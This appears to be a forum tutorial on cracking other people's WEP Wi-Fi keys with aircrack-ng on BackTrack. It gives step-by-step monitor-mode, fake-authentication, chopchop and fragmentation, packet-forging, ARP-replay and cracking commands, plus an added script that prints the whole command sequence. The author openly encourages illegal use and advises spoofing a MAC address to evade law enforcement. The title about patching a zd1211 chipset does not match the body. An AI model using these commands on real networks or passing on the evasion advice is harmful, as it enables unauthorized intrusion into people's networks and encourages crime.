Video Tutorial
How to patch zydas 1211 / zd1211 chipset in order to get injection working
It took me freaking ages to get my stuff working, but finally I did.
The struggle is with the hardware. I have an RTL8185, which is supported by BackTrack 4 now!
So all you need is a copy of BackTrack 4 beta and you are good to go.
Tools (OS) needed:
BackTrack 4 or 5 (or any other Linux; BackTrack is suggested because it ships all the tools). It has to be BT4 (beta or full) or newer: releases below 4 do not have the driver.
aircrack-ng suite - already built into BackTrack, so you only need to install it yourself if you are using another Linux.
Let's get down to the cracking part then.
NOTE: everything is done in the terminal, so when I say "type", it means into the terminal!
NOTE 2: if your interface names are different, fix them in the commands first! My wireless adapter's main interface is "wlan0" and the monitor-mode (rfmon) interface it creates is "mon0", so my examples use those.
1. open a terminal and type
airmon-ng start wlan0
You start it on the real interface (wlan0); airmon-ng then says that monitor mode is enabled on mon0, and mon0 is the interface we capture and inject with from now on.
2. now capture some packets by typing
airodump-ng mon0
Press Ctrl+C to stop it.
Pick your 'victim' (a network whose ENC column says WEP) and copy its BSSID (the AP's MAC) and channel.
3. type
airodump-ng --bssid 00:00:00:00:00:00 --channel 1 --ivs -w yourfile mon0
--bssid < the BSSID you copied
--channel < the channel your 'victim' is/was on
--ivs saves only the IVs instead of whole packets (much smaller files, and the IVs are all aircrack-ng needs for WEP)
-w output prefix; airodump-ng adds a run counter and the extension itself and writes yourfile-01.ivs (do not put .ivs on the end yourself, or you end up with yourfile.ivs-01.ivs)
mon0 < the monitor interface you activated
Now leave it running and do not touch it.
NOTE - you need at least one data packet from the AP to get going. If no data is transferred in 10 minutes or so, pick a new 'victim' or wait until somebody connects.
4. you need to fake-authenticate your MAC address with the AP first, or injection will fail (the AP drops frames from stations that are not associated).
aireplay-ng -1 1 -a 00:00:00:00:00:00 mon0
-1 1 < fake authentication; the number is the reassociation delay in seconds (1 is fine when you are CLOSE to the AP; make it bigger if you are further away and the signal is weak)
-a bssid (MAC) of your victim AP
aireplay-ng authenticates with your card's MAC unless you give -h with another one; whichever it is, every later step must use the same source MAC.
5a. fragmentation attack
aireplay-ng -5 -b 00:00:00:00:00:00 mon0
-b < BSSID (MAC) of your victim AP
mon0 < the interface you send packets from
You need to wait until you get the keystream! It stops and tells you when it is found.
OR
5b. chopchop attack
aireplay-ng -4 -b 00:00:00:00:00:00 mon0
-b < BSSID (MAC) of your victim AP
mon0 < your monitoring interface
Now wait until you get the keystream!
Once it is found, you can move to step 6 and close 4 and 5 (of course do not forget to COPY the keystream file name!!! aireplay-ng prints it when it finishes; it ends in .xor and is named fragment-DATE-TIME.xor from 5a or replay_dec-DATE-TIME.xor from 5b).
NOTE - it seems that method 5b works better, because it seems to need only one packet to chopchop and generate a keystream. Extremely useful if the access point does not send many data packets; about 10 minutes ago I ran into one that sent data packets very rarely.
6. let's build a packet using the keystream file
packetforge-ng -0 -a (bssid) -h (your mac) -k 255.255.255.255 -l 255.255.255.255 -y keystream.xor -w packet1
-0 < forge an ARP request
-a < MAC of your victim AP
-h < source MAC. It is required, and it must be the MAC you fake-authenticated in step 4 (your card's MAC unless you used -h there); a random one is silently dropped by the AP
-k / -l < destination and source IP. 255.255.255.255 (broadcast) works on any network, so you do not need to know the subnet
-y < the .xor keystream file from step 5
-w < the output file where the forged packet is saved
7. now let's replay the forged packet to boost the traffic
aireplay-ng -3 -r packet1 -b 00:00:00:00:00:00 mon0
-3 < ARP request replay; -r makes it read the ARP request from packet1 instead of waiting to sniff one. Every replay makes the AP rebroadcast the request with a fresh IV, which is exactly what we collect
-b < BSSID of your victim again
mon0 < the interface you inject from
- How to crack when the router has flood protection
- simply add
-x [number of packets per second]
to the aireplay-ng command above to cap the injection rate (for example -x 50).
8. now check your airodump-ng window from step 3 and wait until the #Data column shows about 75000-100000 packets (works FINE on WEP)
9. now we can try to crack that key. DO NOT close airodump-ng, let it keep capturing
aircrack-ng yourfile-01.ivs
It should give you the key in less than 5 seconds!
If you didn't get it, then post your error here, because I was always successful at this point. If it says not found or something, then maybe you didn't have enough packets; wait until you have 200000 packets and try again. I will include some screens here too (look below).
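The nine steps above as one driver script, added here as an example; it is not the original poster's script. It does not execute aircrack-ng at all: it prints each command in order (a dry run) so the pieces can be checked before you type them, and it encodes the three things that usually go wrong: the same source MAC (-h) is used for fake auth, chopchop, packetforge-ng and injection; -x is only added when a packets-per-second cap is given; and the crack step reads yourprefix-01.ivs, the file airodump-ng actually writes. The BSSID 00:11:22:33:44:55, the MAC 00:aa:bb:cc:dd:ee, channel 6, the prefix wepcap and the interface names are made-up placeholders, and the keystream file name stands for whatever aireplay-ng printed when chopchop finished.

```shell
#!/bin/sh
# Added example (not the original post's code): dry-run driver for the
# aircrack-ng WEP workflow. Prints commands, never runs them. All values
# below are placeholders you substitute with your own.

# Accept only aa:bb:cc:dd:ee:ff (hex, either case) so a typo in the BSSID
# or source MAC is caught before any command is issued.
is_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# airodump-ng -w PREFIX --ivs writes PREFIX-01.ivs (02, 03 ... on later
# runs), so that is the name aircrack-ng must be given, not PREFIX.ivs.
ivs_file() {   # $1 prefix, $2 run number
    printf '%s-%02d.ivs\n' "$1" "$2"
}

# Step 1: monitor mode is started on the real interface; airmon-ng creates
# the monitor interface (mon0 in the post) that every later step uses.
cmd_monitor() {   # $1 wireless interface
    printf 'airmon-ng start %s\n' "$1"
}

# Step 3: lock onto one AP and save only IVs.
cmd_capture() {   # $1 bssid, $2 channel, $3 prefix, $4 monitor iface
    printf 'airodump-ng --bssid %s --channel %s --ivs -w %s %s\n' "$1" "$2" "$3" "$4"
}

# Step 4: fake authentication; "1" is the reassociation delay in seconds.
cmd_fakeauth() {  # $1 bssid, $2 source mac, $3 monitor iface
    printf 'aireplay-ng -1 1 -a %s -h %s %s\n' "$1" "$2" "$3"
}

# Step 5b: chopchop one data packet to recover a keystream (.xor) file.
cmd_chopchop() {  # $1 bssid, $2 source mac, $3 monitor iface
    printf 'aireplay-ng -4 -b %s -h %s %s\n' "$1" "$2" "$3"
}

# Step 6: forge a broadcast ARP request from the keystream. -h is required
# and must be the fake-authenticated MAC or the AP drops the frame.
cmd_forge() {     # $1 bssid, $2 source mac, $3 keystream .xor, $4 output
    printf 'packetforge-ng -0 -a %s -h %s -k 255.255.255.255 -l 255.255.255.255 -y %s -w %s\n' "$1" "$2" "$3" "$4"
}

# Step 7: replay the forged request; a pps value > 0 adds -x, the cap the
# post recommends for APs with flood protection.
cmd_inject() {    # $1 bssid, $2 source mac, $3 monitor iface, $4 forged pkt, $5 pps
    if [ "$5" -gt 0 ]; then
        printf 'aireplay-ng -3 -r %s -b %s -h %s -x %s %s\n' "$4" "$1" "$2" "$5" "$3"
    else
        printf 'aireplay-ng -3 -r %s -b %s -h %s %s\n' "$4" "$1" "$2" "$3"
    fi
}

# Step 9: crack from the IVs file airodump-ng really wrote.
cmd_crack() {     # $1 prefix
    printf 'aircrack-ng %s\n' "$(ivs_file "$1" 1)"
}

# Print the whole plan in order. Returns 1 and prints nothing if either MAC
# is malformed, so a bad value never reaches the radio.
print_plan() {    # $1 bssid, $2 channel, $3 wifi iface, $4 monitor iface, $5 prefix, $6 source mac, $7 pps
    is_mac "$1" && is_mac "$6" || return 1
    cmd_monitor "$3"
    cmd_capture "$1" "$2" "$5" "$4"
    cmd_fakeauth "$1" "$6" "$4"
    cmd_chopchop "$1" "$6" "$4"
    # Placeholder for the file name aireplay-ng printed in step 5b.
    cmd_forge "$1" "$6" 'replay_dec-DATE-TIME.xor' arp-request
    cmd_inject "$1" "$6" "$4" arp-request "$7"
    cmd_crack "$5"
}

# Demo with constructed placeholder values (made-up BSSID, MAC and channel).
print_plan 00:11:22:33:44:55 6 wlan0 mon0 wepcap 00:aa:bb:cc:dd:ee 50
```

Run it as-is to see the seven commands; replace the placeholders with your own BSSID, channel, interfaces and the .xor name aireplay-ng gave you, then type the printed lines into separate terminals in that order, leaving the airodump-ng one running throughout. Pass 0 as the last argument when the AP has no flood protection and the -x cap is omitted.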
WARNING! I should warn you that it is illegal to crack somebody else's network, but who gives a shit these days?! Just spoof your MAC and make sure there are no FBI vans outside who may use GPS to track the source (you).
UPDATE:
Recently I discovered that I do not need to use airmon-ng at all. I can simply do "airodump-ng wlan0" and it puts my card into monitor mode too.
UPDATE:
Scratch that last update; I don't know why it worked before, but now I do need to use airmon-ng, maybe some fuck-up.
Anyway, I found out that the "delay" mentioned in step 5 is always good to put on 1.
UPDATE:
At first I thought that you need over 50000 packets to successfully crack WEP (based on what I had read about WEP cracking), but from my own experience, 20000-30000 is more than enough, of course depending on the strength of the key. I managed to crack one network with 10000 IVs! I included the screenshot of it (last screen).
UPDATE:
I recently cracked 2 more WEPs; I was able to crack both with about 10000 IVs only. One had 12000 and the other had 10000 or so.
UPDATE:
I have played around with WEP networks in the past 3 days. It is kind of obvious, but still worth mentioning: it is not just the antenna that matters, it is very important to have a proper card too.
For example, I have tested with a USB adapter and a PCI adapter (a TP-Link with an Atheros chipset and some PCI card with an RTL8185 chipset).
I left the antenna in the same place. Using Windows XP and the PCI card, the signal was quite OK; I was able to connect to the station, and the speedtest ping was 60ms, which is quite good. Using the USB adapter and BackTrack 5, I barely saw the station.
I have no idea how powerful these cards are, but my guess is 500-1000mW. I'm getting a 2000mW card now, hoping it will give an even better signal.